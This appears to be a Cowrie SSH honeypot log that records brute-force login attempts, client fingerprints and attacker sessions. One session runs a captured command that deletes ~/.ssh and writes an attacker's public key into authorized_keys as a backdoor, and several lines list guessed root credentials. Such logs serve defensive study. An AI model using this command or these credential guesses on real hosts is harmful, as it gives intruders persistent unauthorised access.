{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56990,"dst_ip":"1.2.3.4","dst_port":22,"session":"24b5445c7000","protocol":"ssh","message":"New connection: 212.227.235.229:56990 (1.2.3.4:22) [session: 24b5445c7000]","sensor":"my-vps","timestamp":"2025-08-31T03:29:51.328268Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:51.507724Z","src_ip":"212.227.235.229","session":"d9c007e7eb82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46620,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0590ef6e874","protocol":"ssh","message":"New connection: 212.227.125.160:46620 (1.2.3.4:22) [session: c0590ef6e874]","sensor":"my-vps","timestamp":"2025-08-31T03:30:00.174561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:30:00.175706Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:30:00.425960Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52488,"dst_ip":"1.2.3.4","dst_port":22,"session":"986be4811e2a","protocol":"ssh","message":"New connection: 41.226.27.251:52488 (1.2.3.4:22) [session: 986be4811e2a]","sensor":"my-vps","timestamp":"2025-08-31T03:30:00.915619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:00.982782Z","src_ip":"41.226.27.251","session":"986be4811e2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:30:00.983693Z","src_ip":"41.226.27.251","session":"986be4811e2a"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:30:01.160373Z","src_ip":"41.226.27.251","session":"986be4811e2a"}
{"eventid":"cowrie.login.success","username":"root","password":"123@Abc","message":"login attempt [root/123@Abc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:30:01.532307Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:30:02.073685Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.074850Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.076454Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.329072Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.562424Z","src_ip":"41.226.27.251","session":"986be4811e2a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.778167Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.779714Z","src_ip":"212.227.235.229","session":"24b5445c7000"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:30:02.906286Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:30:02.907229Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:30:03.158721Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:03.159684Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47540,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0bc6b9d4b99","protocol":"ssh","message":"New connection: 212.227.125.160:47540 (1.2.3.4:22) [session: a0bc6b9d4b99]","sensor":"my-vps","timestamp":"2025-08-31T03:30:03.404733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:30:03.406007Z","src_ip":"212.227.125.160","session":"a0bc6b9d4b99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:30:03.650887Z","src_ip":"212.227.125.160","session":"a0bc6b9d4b99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58558,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ee686043dc3","protocol":"ssh","message":"New connection: 212.227.235.229:58558 (1.2.3.4:22) [session: 5ee686043dc3]","sensor":"my-vps","timestamp":"2025-08-31T03:30:03.997312Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:30:04.677677Z","src_ip":"212.227.125.160","session":"a0bc6b9d4b99"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:04.960237Z","src_ip":"212.227.235.229","session":"5ee686043dc3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:30:04.961426Z","src_ip":"212.227.235.229","session":"5ee686043dc3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:05.945636Z","src_ip":"212.227.125.160","session":"a0bc6b9d4b99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48358,"dst_ip":"1.2.3.4","dst_port":22,"session":"32c34850b9e7","protocol":"ssh","message":"New connection: 212.227.125.160:48358 (1.2.3.4:22) [session: 32c34850b9e7]","sensor":"my-vps","timestamp":"2025-08-31T03:30:06.191032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:30:06.191977Z","src_ip":"212.227.125.160","session":"32c34850b9e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:30:06.442863Z","src_ip":"212.227.125.160","session":"32c34850b9e7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:30:07.487563Z","src_ip":"212.227.125.160","session":"32c34850b9e7"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:07.739198Z","src_ip":"212.227.125.160","session":"c0590ef6e874"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:07.740458Z","src_ip":"212.227.125.160","session":"32c34850b9e7"}
{"eventid":"cowrie.login.failed","username":"guest","password":"root123","message":"login attempt [guest/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:30:10.655944Z","src_ip":"212.227.235.229","session":"5ee686043dc3"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:12.651291Z","src_ip":"212.227.235.229","session":"5ee686043dc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49554,"dst_ip":"1.2.3.4","dst_port":22,"session":"327eee462035","protocol":"ssh","message":"New connection: 212.227.125.160:49554 (1.2.3.4:22) [session: 327eee462035]","sensor":"my-vps","timestamp":"2025-08-31T03:30:20.244087Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38056,"dst_ip":"1.2.3.4","dst_port":22,"session":"822c9d831d35","protocol":"ssh","message":"New connection: 41.226.27.251:38056 (1.2.3.4:22) [session: 822c9d831d35]","sensor":"my-vps","timestamp":"2025-08-31T03:30:21.082614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:21.084120Z","src_ip":"41.226.27.251","session":"822c9d831d35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:30:21.131350Z","src_ip":"41.226.27.251","session":"822c9d831d35"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-31T03:30:21.273883Z","src_ip":"41.226.27.251","session":"822c9d831d35"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:21.583434Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:30:21.584529Z","src_ip":"212.227.125.160","session":"327eee462035"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:30:22.517198Z","src_ip":"41.226.27.251","session":"822c9d831d35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48688,"dst_ip":"1.2.3.4","dst_port":22,"session":"e96c0424e523","protocol":"ssh","message":"New connection: 212.227.125.160:48688 (1.2.3.4:22) [session: e96c0424e523]","sensor":"my-vps","timestamp":"2025-08-31T03:30:24.945191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:30:25.554430Z","src_ip":"212.227.125.160","session":"e96c0424e523"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 